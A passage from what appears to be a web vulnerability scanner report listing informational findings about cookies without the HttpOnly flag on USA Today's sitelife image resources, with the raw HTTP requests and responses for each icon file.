Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "9fd4e3e46b7ccb1:2af"
If-Modified-Since: Thu, 04 Nov 2010 22:01:55 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:14 GMT
Etag: "9fd4e3e46b7ccb1:2af"
Connection: close


11.77. http://sitelife.usatoday.com/ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "b8e68df3917acb1:2af"
If-Modified-Since: Tue, 02 Nov 2010 13:29:18 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:13 GMT
Etag: "b8e68df3917acb1:2af"
Connection: close


11.78. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/email/pluck-email-icon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/email/pluck-email-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/email/pluck-email-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 253
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "5eb1bcf4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:55 GMT
Connection: close

GIF89a.............................................................|||zzzxxxuuuqqqooollliiieee```]]].........!.......,..........z`..dY.A.......40.@P.......l#.H$..p.9.&.Ub.K.(..A!.(..J%0(G..."R..,.@..D
...[SNIP]...

11.79. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 211
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "ccb29df4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:57 GMT
Connection: close

GIF89a.............cb]`_Z~}x..~.....................III>>>000,,,###..........................................!.......,..........P.%.di.h...X4pS.o<.Np..C.:...x<....X.(".Hp.....    C".P..    w+.,..EEP>....en.
...[SNIP]...

11.80. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 391
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "aaecb7f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:59 GMT
Connection: close

GIF89a.................Ziq9Q.......l......j...........
..N.....,..f..u..Q.....p....a*U8'........y..........mm...........................................................................................
...[SNIP]...

11.81. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 106
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "508ab5f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:56 GMT
Connection: close

GIF89a...............................!.......,........../H...P..b..>.....9.....................=...$.q...;

11.82. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-digg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-digg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-digg.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 137
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "f627b3f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:56 GMT
Connection: close

GIF89a...............................!.......,..........Nx...%F...uQ.....}Ft.BY.Czxm.n-AY.1..a.....S.@.......#X..Q....r.    f.4J...........;

11.83. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-fb.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-fb.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-fb.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 345
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "aaecb7f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:56 GMT
Connection: close

GIF89a.............)>k=Z.`x.bz.d{.k..Te.h}.Td.t........;Y.)>j<Z.Mi.Tn.F[.FZ.d|.Tf.k..l..Tf.l..j.i~.w...................................................................................................
...[SNIP]...

11.84. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-ff.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-ff.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-ff.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 173
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "aaecb7f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:56 GMT
Connection: close

GIF89a.............C~....S..d..U........q..t.................!.......,..........Zp.Ik.(......".PT.bX.@.D.N.|. X.G>P........CL..)`..2.3-[..k....RYu7......L;.N...=8..-..._D..;

11.85. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 172
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "aaecb7f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:56 GMT
Connection: close

GIF89a......................D......T..].`....................!.......,..........Y..D..2..;.^.i.!....F..G."&...!.H!...n.8(..U. L...F!.(.....i.q......~.FBl.K...x,(w!..\=....;

11.86. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 118
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "f627b3f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:56 GMT
Connection: close

GIF89a.............Cx.g...E..........!.......,..........;x......J9q.)...(    .!|]).J!...?4.g.7\G....o......$I...8N-*....;

11.87. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 271
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "508ab5f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:57 GMT
Connection: close

GIF89a.............xxz...............iji04.^cSMML........K.m,........w.!.........................fff.........!.......,...........`'...e."Td.    .p    YK".hq.-..Q.S. .4....m...&..X..E.$x. .....\8.. q    <&..c..
...[SNIP]...

11.88. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 85
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "508ab5f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:57 GMT
Connection: close

GIF89a...................!.......,..........&....'... .Y-./..u.%...N.T..S.1h........;

11.89. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 378
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "f627b3f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:58 GMT
Connection: close

GIF89a...................Sk.....J.-g..V.U.....D..q...o..]....S...........v...........v..<.J$.-........h.[..............................................................................................
...[SNIP]...

11.90. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 606
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "f627b3f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:58 GMT
Connection: close

GIF89a.............................................................}..t..k.`.\|.Yx.au._u._t.Ut.]q.Pq.Ml.Tk.Pg}Ih.Mg.Jd}Fe.GazBa.E_xI_tC^wG]r=^}E]uA[u?Zs@ZtAZq8Yy=Wq5Uv:Tn8Sl7Qk0Pr3Nh+Mm/Je8IZ6GX,Gb4
...[SNIP]...

11.91. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
